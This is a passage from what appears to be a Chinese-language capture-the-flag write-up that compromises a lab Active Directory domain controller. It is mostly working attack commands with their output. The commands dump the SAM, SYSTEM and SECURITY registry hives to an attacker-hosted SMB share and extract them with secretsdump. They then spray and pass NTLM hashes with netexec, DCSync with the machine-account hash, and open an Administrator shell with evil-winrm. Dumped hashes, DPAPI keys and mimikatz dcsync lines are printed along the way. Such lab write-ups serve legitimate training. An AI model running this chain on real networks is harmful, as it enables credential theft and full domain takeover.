domain_users.json\n-rw-rw-r-- 1 kali kali      569 Jun 12 11:20 hash\n-rwxrwxr-x 1 kali kali  8286607 Dec  6  2021 kerbrute_linux_amd64\n-rw-rw-r-- 1 kali kali    66212 Jun 12 11:05 log1\n-rw-rw-r-- 1 kali kali    45403 Jun 12 11:01 riduser\n-rw-rw-r-- 1 kali kali    10214 Jun 12 11:04 riduser1\n-rw-rw-r-- 1 kali kali        0 Jun 12 04:36 users.txt\n-rw-r--r-- 1 kali kali       33 Jun 12 11:31 user.txt\n-rw-rw-r-- 1 kali kali 83770516 Jun 12 04:31 xato-net-10-million-usernames.txt<\/code><\/pre>\n<p>\u6536\u96c6\u5230\u4e86\u4e00\u4e9b\u4fe1\u606f\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122426.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122426.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250613000317597\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u4e0d\u61c2\u3002\u53ea\u80fd\u770b\u5230\u4e00\u5bf9\u6587\u4ef6\u7cfb\u7edf\uff0c<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122427.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122427.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250613000416785\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02\/domain]\n\u2514\u2500$ grep -Pinr zximena448                             \ndomain_users.json:59484:            &quot;zximena448@soupedecode.local&quot;\ndomain_users.json:59517:            &quot;zximena448&quot;\ndomain_users.json:59547:            &quot;zximena448@soupedecode.local&quot;\ndomain_users_by_group.html:489:&lt;tr&gt;&lt;td&gt;Zach Ximena&lt;\/td&gt;&lt;td&gt;Zach Ximena&lt;\/td&gt;&lt;td&gt;zximena448&lt;\/td&gt;&lt;td&gt;06\/15\/24 20:04:37&lt;\/td&gt;&lt;td&gt;06\/13\/25 06:05:30&lt;\/td&gt;&lt;td&gt;06\/13\/25 06:06:11&lt;\/td&gt;&lt;td&gt;NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQ_PREAUTH&lt;\/td&gt;&lt;td&gt;06\/17\/24 18:09:53&lt;\/td&gt;&lt;td&gt;&lt;abbr title=&quot;S-1-5-21-2986980474-46765180-2505414164-1142&quot;&gt;1142&lt;\/abbr&gt;&lt;\/td&gt;&lt;td&gt;Volunteer teacher and education advocate&lt;\/td&gt;&lt;\/tr&gt;\ndomain_users_by_group.html:997:&lt;tr&gt;&lt;td&gt;Zach Ximena&lt;\/td&gt;&lt;td&gt;Zach Ximena&lt;\/td&gt;&lt;td&gt;zximena448&lt;\/td&gt;&lt;td&gt;06\/15\/24 20:04:37&lt;\/td&gt;&lt;td&gt;06\/13\/25 06:05:30&lt;\/td&gt;&lt;td&gt;06\/13\/25 06:06:11&lt;\/td&gt;&lt;td&gt;NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQ_PREAUTH&lt;\/td&gt;&lt;td&gt;06\/17\/24 18:09:53&lt;\/td&gt;&lt;td&gt;&lt;abbr title=&quot;S-1-5-21-2986980474-46765180-2505414164-1142&quot;&gt;1142&lt;\/abbr&gt;&lt;\/td&gt;&lt;td&gt;Volunteer teacher and education advocate&lt;\/td&gt;&lt;\/tr&gt;\ndomain_users.html:489:&lt;tr&gt;&lt;td&gt;Zach Ximena&lt;\/td&gt;&lt;td&gt;Zach Ximena&lt;\/td&gt;&lt;td&gt;zximena448&lt;\/td&gt;&lt;td&gt;&lt;a href=&quot;domain_users_by_group.html#cn_Backup_Operators&quot; title=&quot;CN=Backup Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL&quot;&gt;Backup Operators&lt;\/a&gt;&lt;\/td&gt;&lt;td&gt;&lt;a href=&quot;domain_users_by_group.html#cn_Domain_Users&quot; title=&quot;CN=Domain Users,CN=Users,DC=SOUPEDECODE,DC=LOCAL&quot;&gt;Domain Users&lt;\/a&gt;&lt;\/td&gt;&lt;td&gt;06\/15\/24 20:04:37&lt;\/td&gt;&lt;td&gt;06\/13\/25 06:05:30&lt;\/td&gt;&lt;td&gt;06\/13\/25 06:06:11&lt;\/td&gt;&lt;td&gt;NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQ_PREAUTH&lt;\/td&gt;&lt;td&gt;06\/17\/24 18:09:53&lt;\/td&gt;&lt;td&gt;&lt;abbr title=&quot;S-1-5-21-2986980474-46765180-2505414164-1142&quot;&gt;1142&lt;\/abbr&gt;&lt;\/td&gt;&lt;td&gt;Volunteer teacher and education advocate&lt;\/td&gt;&lt;\/tr&gt;\ndomain_users.grep:459:Zach Ximena       Zach Ximena     zximena448      Backup Operators        Domain Users    06\/15\/24 20:04:37       06\/13\/25 06:05:30       06\/13\/25 06:06:11       NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQ_PREAUTH 06\/17\/24 18:09:53       S-1-5-21-2986980474-46765180-2505414164-1142    Volunteer teacher and education advocate<\/code><\/pre>\n<p>\u53d1\u73b0<code>zximena448<\/code>\u7528\u6237\uff0c\u5f97\u5230\u4ee5\u4e0b\u4fe1\u606f\uff1a<\/p>\n<blockquote>\n<ul>\n<li><strong>\u7528\u6237\u5168\u540d<\/strong>\uff1aZach Ximena<\/li>\n<li><strong>\u7528\u6237\u540d<\/strong>\uff1a<code>zximena448<\/code><\/li>\n<li>\u6240\u5c5e\u7ec4\uff1a\n<ul>\n<li><code>Backup Operators<\/code>\uff08\u5907\u4efd\u64cd\u4f5c\u5458\u7ec4\uff09\uff1a\u62e5\u6709\u7cfb\u7edf\u6587\u4ef6\u5907\u4efd\u548c\u6062\u590d\u6743\u9650\u7684\u9ad8\u6743\u9650\u7ec4<\/li>\n<li><code>Domain Users<\/code>\uff08\u57df\u7528\u6237\u7ec4\uff09\uff1a\u9ed8\u8ba4\u666e\u901a\u7528\u6237\u7ec4\u3002<\/li>\n<\/ul>\n<\/li>\n<li>\u8d26\u6237\u72b6\u6001\u6807\u5fd7\n<ul>\n<li><code>NORMAL_ACCOUNT<\/code>\uff1a\u6807\u51c6\u7528\u6237\u8d26\u6237\u7c7b\u578b\u3002<\/li>\n<li><code>DONT_EXPIRE_PASSWD<\/code>\uff1a<strong>\u5bc6\u7801\u6c38\u4e0d\u8fc7\u671f<\/strong>\uff08\u8fdd\u53cd\u5e38\u89c4\u5b89\u5168\u7b56\u7565\uff09\u3002<\/li>\n<li><code>DONT_REQ_PREAUTH<\/code>\uff1a<strong>\u7981\u7528Kerberos\u9884\u8ba4\u8bc1<\/strong>\uff08\u9ad8\u5371\u914d\u7f6e\uff09\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Backup Operators \u7ec4\u5728 Windows \u63d0\u6743\u4e2d\u5177\u6709\u91cd\u8981\u4ef7\u503c\uff0c\u5176\u6838\u5fc3\u80fd\u529b\u5728\u4e8e<strong>\u7ed5\u8fc7\u6587\u4ef6\u6743\u9650\u9650\u5236<\/strong>\u548c<strong>\u83b7\u53d6\u654f\u611f\u7cfb\u7edf\u6570\u636e<\/strong>\u3002\u4ee5\u4e0b\u662f\u5176\u5177\u4f53\u5229\u7528\u65b9\u5f0f\u548c\u653b\u51fb\u573a\u666f\u5206\u6790\uff1a<\/p>\n<hr \/>\n<h3>\ud83d\udd11 <strong>1. \u6838\u5fc3\u6743\u9650\u7279\u6027<\/strong><\/h3>\n<ul>\n<li>\n<p>\u7ed5\u8fc7 ACL \u9650\u5236\uff1aBackup Operators \u7ec4\u9ed8\u8ba4\u62e5\u6709 <strong>SeBackupPrivilege<\/strong>\u7279\u6743\uff0c\u5141\u8bb8\u6210\u5458<\/p>\n<p>\u65e0\u89c6\u6587\u4ef6\/\u76ee\u5f55\u7684 ACL**\uff0c\u76f4\u63a5\u5907\u4efd\u7cfb\u7edf\u5173\u952e\u6587\u4ef6\uff08\u5982<code>SAM<\/code>\u3001<code>SYSTEM<\/code>\u3001<code>NTDS.dit<\/code>\uff09<\/p>\n<\/li>\n<li>\n<p>\u8fdc\u7a0b\u8bbf\u95ee\u6743\u9650<\/p>\n<p>\u5728\u57df\u73af\u5883\u4e2d\uff0c\u6210\u5458\u53ef\u8fdc\u7a0b\u8bbf\u95ee\u57df\u63a7\u5236\u5668\u7684\u6587\u4ef6\u5171\u4eab\uff08\u5982<code>\\\\DC\\C$<\/code>\uff09\uff0c\u5bfc\u51fa\u6ce8\u518c\u8868\u914d\u7f6e\u5355\u5143\uff08Hive\uff09<\/p>\n<\/li>\n<\/ul>\n<hr \/>\n<h3>\u2699\ufe0f <strong>2. \u63d0\u6743\u6280\u672f\u8def\u5f84<\/strong><\/h3>\n<h4><strong>\u8def\u5f84\u4e00\uff1a\u5bfc\u51fa\u672c\u5730\u654f\u611f\u6587\u4ef6<\/strong><\/h4>\n<ol>\n<li>\n<p>\u5907\u4efd SAM\/SECURITY\/SYSTEM \u4f7f\u7528\u5de5\u5177\uff08\u5982BackupOperatorToolkit\uff09\u5bfc\u51fa\u6ce8\u518c\u8868\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-powershell\">.\\BackupOperatorToolkit.exe DUMP c:\\ \\\\\u76ee\u6807\u4e3b\u673a\\C$<\/code><\/pre>\n<p>\u901a\u8fc7<code>secretdump<\/code>\u89e3\u6790 SAM \u6587\u4ef6\u83b7\u53d6\u672c\u5730\u8d26\u6237\u54c8\u5e0c\uff1a<\/p>\n<pre><code class=\"language-bash\">secretdump.exe LOCAL -system SYSTEM -security SECURITY -sam SAM<\/code><\/pre>\n<\/li>\n<li>\n<p>\u63d0\u53d6\u57df\u63a7\u673a\u5668\u8d26\u6237\u54c8\u5e0c\u5bfc\u51fa\u57df\u63a7\u7684<code>SYSTEM<\/code>\u548c<code>SECURITY<\/code>\u6587\u4ef6\u540e\uff0c\u53ef\u83b7\u53d6\u57df\u673a\u5668\u8d26\u6237\u7684 <code>NTLM<\/code> \u54c8\u5e0c\uff0c\u7528\u4e8e <code>DCSync<\/code> \u653b\u51fb\u7a83\u53d6\u57df\u7ba1\u7406\u5458\u51ed\u636e\uff1a<\/p>\n<pre><code class=\"language-powershell\">mimikatz.exe \"lsadump::dcsync \/domain:DOMAIN \/user:krbtgt\"<\/code><\/pre>\n<\/li>\n<\/ol>\n<\/blockquote>\n<h3>\u63d0\u53d6hash\u83b7\u53d6\u51ed\u8bc1<\/h3>\n<p>\u63a5\u4e0b\u6765\u5c31\u662f\u641e\u4e00\u4e2a\u4e34\u65f6\u7684<code>smb<\/code>\u670d\u52a1\u5668\uff0c\u5c1d\u8bd5\u5c06\u8fdc\u7a0b\u6587\u4ef6\u53cahash\u5bfc\u5165\u672c\u5730\u5c1d\u8bd5\u7834\u89e3\uff1a<\/p>\n<blockquote>\n<p>\u53c2\u8003\uff1a<a href=\"https:\/\/book.hacktricks.wiki\/en\/generic-hacking\/exfiltration.html#smb\">https:\/\/book.hacktricks.wiki\/en\/generic-hacking\/exfiltration.html#smb<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\"># kali1\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02\/domain]\n\u2514\u2500$ mkdir share        \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02\/domain]\n\u2514\u2500$ impacket-smbserver -smb2support kali .\/share     \nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Config file parsed\n[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0\n[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0\n[*] Config file parsed\n[*] Config file parsed\n<\/code><\/pre>\n<pre><code class=\"language-bash\"># kali2\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ impacket-reg &quot;SOUPEDECODE.LOCAL\/zximena448:internet@$IP&quot; backup -o \/\/192.168.10.106\/kali\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...\n[*] Saved HKLM\\SAM to \/\/192.168.10.106\/kali\\SAM.save\n[*] Saved HKLM\\SYSTEM to \/\/192.168.10.106\/kali\\SYSTEM.save\n[*] Saved HKLM\\SECURITY to \/\/192.168.10.106\/kali\\SECURITY.save<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122428.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122428.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250613004030970\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u5c1d\u8bd5\u63d0\u53d6\u51ed\u8bc1\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02\/domain\/share]\n\u2514\u2500$ impacket-secretsdump -system SYSTEM.save -security SECURITY.save -sam SAM.save LOCAL\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6\n[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n[*] Dumping cached domain logon information (domain\/username:hash)\n[*] Dumping LSA Secrets\n[*] $MACHINE.ACC \n$MACHINE.ACC:plain_password_hex:19286592fd00ce11d2770da8d073c4aff9406be41f4da2ef7448aa9cc07412b1550720b72e6b575fdceb4f4718204cc467c8efb94c6fe09ee402abb8680044ca2ff49d331a864a7248f0ee22e0b1ad670f8d8c089ff3581c6cb76a50db8704cf4caf7632011bee609536d287107bd6e01673b16e2bc3dce159a70032b9eb9a1495307abdf7203e42c17249e452d7dd5987e30615fd2cdfbbfe9c6d5652fdb68cf39a9cf2d65661e2a71df8cd62bfc0606fb3b8d26e09334708a65da33b17f63f824d28d2ba9027ef671742a04743d16bce623e08026803983806ae426eccd2a0e29993e6f196a14b86efd2ef2ea63b6a\n$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:f57e704569f3ff005004963445e0438c\n[*] DPAPI_SYSTEM \ndpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4\ndpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503\n[*] NL$KM \n 0000   44 C5 ED CE F5 0E BF 0C  15 63 8B 8D 2F A3 06 8F   D........c..\/...\n 0010   62 4D CA D9 55 20 44 41  75 55 3E 85 82 06 21 14   bM..U DAuU&gt;...!.\n 0020   8E FA A1 77 0A 9C 0D A4  9A 96 44 7C FC 89 63 91   ...w......D|..c.\n 0030   69 02 53 95 1F ED 0E 77  B5 24 17 BE 6E 80 A9 91   i.S....w.$..n...\nNL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991\n[*] Cleaning up...<\/code><\/pre>\n<p>\u622a\u53d6\u7968\u636e\u8fdb\u884c\u767b\u5f55\u5373\u53ef\uff01<\/p>\n<blockquote>\n<h3>\ud83d\udd11 <strong>1. \u7cfb\u7edf\u5f15\u5bfc\u5bc6\u94a5\uff08BootKey\uff09<\/strong><\/h3>\n<ul>\n<li><strong>\u5185\u5bb9<\/strong>\uff1a<code>0x0c7ad5e1334e081c4dfecd5d77cc2fc6<\/code><\/li>\n<li><strong>\u4f5c\u7528<\/strong>\uff1a\u7528\u4e8e\u52a0\u5bc6 DPAPI \u4e3b\u5bc6\u94a5\uff08MasterKey\uff09\uff0c\u8fdb\u800c\u4fdd\u62a4\u7528\u6237\u51ed\u636e\u3001\u52a0\u5bc6\u6587\u4ef6\u7b49\u654f\u611f\u6570\u636e\u3002<\/li>\n<li>\u98ce\u9669\uff1a\u82e5 BootKey \u6cc4\u9732\uff0c\u653b\u51fb\u8005\u53ef\u89e3\u5bc6\u6240\u6709 DPAPI \u4fdd\u62a4\u7684\u5bc6\u94a5\uff08\u5982 LSASS \u8fdb\u7a0b\u4e2d\u7684\u51ed\u636e\uff09<\/li>\n<\/ul>\n<hr \/>\n<h3>\ud83d\udee1\ufe0f <strong>2. \u672c\u5730 SAM \u54c8\u5e0c\u8f6c\u50a8<\/strong><\/h3>\n<pre><code class=\"language-ldif\">Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<\/code><\/pre>\n<ul>\n<li>\u5b57\u6bb5\u89e3\u6790\uff1a\n<ul>\n<li><code>500<\/code>\/<code>501<\/code>\uff1a\u7528\u6237 RID\uff08Administrator\/RID 500\uff0cGuest\/RID 501\uff09<\/li>\n<li><code>aad3b435b51404eeaad3b435b51404ee<\/code>\uff1aLM \u54c8\u5e0c\uff08\u7a7a\u5bc6\u7801\u6216\u5f31\u5bc6\u7801\u7279\u5f81\u503c\uff09<\/li>\n<li><code>209c6174da490caeb422f3fa5a7ae634<\/code>\uff1aNTLM \u54c8\u5e0c\uff08\u53ef\u79bb\u7ebf\u7834\u89e3\uff09<\/li>\n<\/ul>\n<\/li>\n<li>\u98ce\u9669\uff1a\n<ul>\n<li><strong>Administrator \u8d26\u6237<\/strong>\uff1aNTLM \u54c8\u5e0c\u6709\u6548\uff0c\u53ef\u88ab\u7528\u4e8e Pass-the-Hash\uff08PtH\uff09\u653b\u51fb\u6a2a\u5411\u6e17\u900f\u3002<\/li>\n<li>Guest \u8d26\u6237\uff1aLM \u54c8\u5e0c\u4e3a\u9ed8\u8ba4\u7a7a\u5bc6\u7801\u503c\uff0c\u8868\u660e\u8d26\u6237\u672a\u542f\u7528\u5bc6\u7801\u6216\u5b58\u5728\u914d\u7f6e\u9519\u8bef<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr \/>\n<h3>\ud83d\udddd\ufe0f <strong>3. LSA Secrets \u6cc4\u9732<\/strong><\/h3>\n<h4><strong>$MACHINE.ACC<\/strong><\/h4>\n<ul>\n<li>\n<p>\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-plaintext\">$MACHINE.ACC:plain_password_hex:19286592fd00ce11d2770da8d073c4aff9406be41f4da2ef7448aa9cc07412b1550720b72e6b575fdceb4f4718204cc467c8efb94c6fe09ee402abb8680044ca2ff49d331a864a7248f0ee22e0b1ad670f8d8c089ff3581c6cb76a50db8704cf4caf7632011bee609536d287107bd6e01673b16e2bc3dce159a70032b9eb9a1495307abdf7203e42c17249e452d7dd5987e30615fd2cdfbbfe9c6d5652fdb68cf39a9cf2d65661e2a71df8cd62bfc0606fb3b8d26e09334708a65da33b17f63f824d28d2ba9027ef671742a04743d16bce623e08026803983806ae426eccd2a0e29993e6f196a14b86efd2ef2ea63b6a\n$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:f57e704569f3ff005004963445e0438c<\/code><\/pre>\n<\/li>\n<li>\n<p><strong>\u4f5c\u7528<\/strong>\uff1a\u5b58\u50a8\u7cfb\u7edf\u8d26\u6237\uff08<code>SYSTEM<\/code>\uff09\u7684\u52a0\u5bc6\u5bc6\u7801\u54c8\u5e0c\u3002<\/p>\n<\/li>\n<li>\n<p>\u98ce\u9669\uff1a<\/p>\n<ul>\n<li>\u82e5 <code>plain_password_hex<\/code> \u4e3a\u6709\u6548\u660e\u6587\uff0c\u653b\u51fb\u8005\u53ef\u76f4\u63a5\u83b7\u53d6\u7cfb\u7edf\u6743\u9650\u3002<\/li>\n<li><code>aad3b435b51404eeaad3b435b51404ee<\/code> \u4e3a LM \u54c8\u5e0c\u7a7a\u503c\uff0c<\/li>\n<li><code>f57e704569f3ff005004963445e0438c<\/code>\u4e3a NTLM \u54c8\u5e0c\uff0c\u53ef\u5c1d\u8bd5\u7834\u89e3<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr \/>\n<h3>\ud83d\udd04 <strong>4. DPAPI \u7cfb\u7edf\u5bc6\u94a5<\/strong><\/h3>\n<pre><code class=\"language-plaintext\">dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4\ndpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503<\/code><\/pre>\n<ul>\n<li>\u4f5c\u7528\uff1a\n<ul>\n<li><code>dpapi_machinekey<\/code>\uff1a\u52a0\u5bc6 DPAPI \u4e3b\u5bc6\u94a5\u7684\u673a\u5668\u7ea7\u5bc6\u94a5\u3002<\/li>\n<li><code>dpapi_userkey<\/code>\uff1a\u7528\u6237\u7ea7\u5bc6\u94a5\uff0c\u7528\u4e8e\u89e3\u5bc6\u7528\u6237\u51ed\u636e\uff08\u5982\u6d4f\u89c8\u5668\u5bc6\u7801\u3001RDP \u51ed\u636e\uff09\u3002<\/li>\n<\/ul>\n<\/li>\n<li>\u98ce\u9669\uff1a\u6cc4\u9732\u540e\uff0c\u653b\u51fb\u8005\u53ef\u89e3\u5bc6\u672c\u5730\u52a0\u5bc6\u6570\u636e\uff08\u5982 Chrome \u4fdd\u5b58\u7684\u5bc6\u7801\u3001Outlook \u51ed\u636e\uff09<\/li>\n<\/ul>\n<hr \/>\n<h3>\ud83d\udce1 <strong>5. NL$KM\uff08Netlogon \u5bc6\u94a5\uff09<\/strong><\/h3>\n<pre><code class=\"language-plaintext\">NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991<\/code><\/pre>\n<ul>\n<li><strong>\u4f5c\u7528<\/strong>\uff1a\u52a0\u5bc6\u57df\u63a7\u5236\u5668\u95f4\u901a\u4fe1\u7684\u5bc6\u94a5\uff0c\u7528\u4e8e\u8eab\u4efd\u9a8c\u8bc1\u548c\u4f1a\u8bdd\u5b89\u5168\u3002<\/li>\n<li>\u98ce\u9669\uff1a\u6cc4\u9732\u540e\uff0c\u653b\u51fb\u8005\u53ef\u4f2a\u9020\u57df\u63a7\u5236\u5668\u8eab\u4efd\uff0c\u5b9e\u65bd\u4e2d\u95f4\u4eba\u653b\u51fb\u6216\u57df\u52ab\u6301<\/li>\n<\/ul>\n<\/blockquote>\n<p>\u8f6e\u6d41\u8fdb\u884c\u5c1d\u8bd5\uff0c\u4e00\u5171\u6ca1\u51e0\u4e2a\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ cat ntlm \n209c6174da490caeb422f3fa5a7ae634\n31d6cfe0d16ae931b73c59d7e0c089c0\nf57e704569f3ff005004963445e0438c\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb $IP -u .\/riduser2 -H 209c6174da490caeb422f3fa5a7ae634 &gt; log2\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb $IP -u .\/riduser2 -H 31d6cfe0d16ae931b73c59d7e0c089c0 &gt;&gt; log2\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb $IP -u .\/riduser2 -H f57e704569f3ff005004963445e0438c &gt;&gt; log2\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ cat log2 | grep &quot;[+]&quot;\nSMB                      192.168.10.107  445    DC01             [+] SOUPEDECODE.LOCAL\\DC01$:f57e704569f3ff005004963445e0438c<\/code><\/pre>\n<p>\u627e\u5230\u4e86\u4e00\u4e2a\u51ed\u8bc1\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ impacket-secretsdump &#039;SOUPEDECODE.LOCAL\/DC01$@192.168.10.107&#039; -hashes &#039;aad3b435b51404eeaad3b435b51404ee:f57e704569f3ff005004963445e0438c&#039; &gt; log3\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ cat log3 | grep &quot;:500:&quot;\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:8982babd4da89d33210779a6c5b078bd:::<\/code><\/pre>\n<p>\u5f97\u5230\u5185\u7f6e\u7528\u6237\u51ed\u8bc1\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff0c\u5f53\u7136\u5982\u679c\u4e0d\u786e\u5b9a\u4e5f\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb $IP -u Administrator -H 8982babd4da89d33210779a6c5b078bd\nSMB         192.168.10.107  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.107  445    DC01             [+] SOUPEDECODE.LOCAL\\Administrator:8982babd4da89d33210779a6c5b078bd (Pwn3d!)<\/code><\/pre>\n<h3>\u5229\u7528\u51ed\u8bc1\u83b7\u53d6shell<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122429.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122429.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250613011944459\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ evil-winrm -i $IP -u &#039;administrator&#039; -H &#039;8982babd4da89d33210779a6c5b078bd&#039;\n\nEvil-WinRM shell v3.7\n\nWarning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc&#039; for module Reline\n\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote 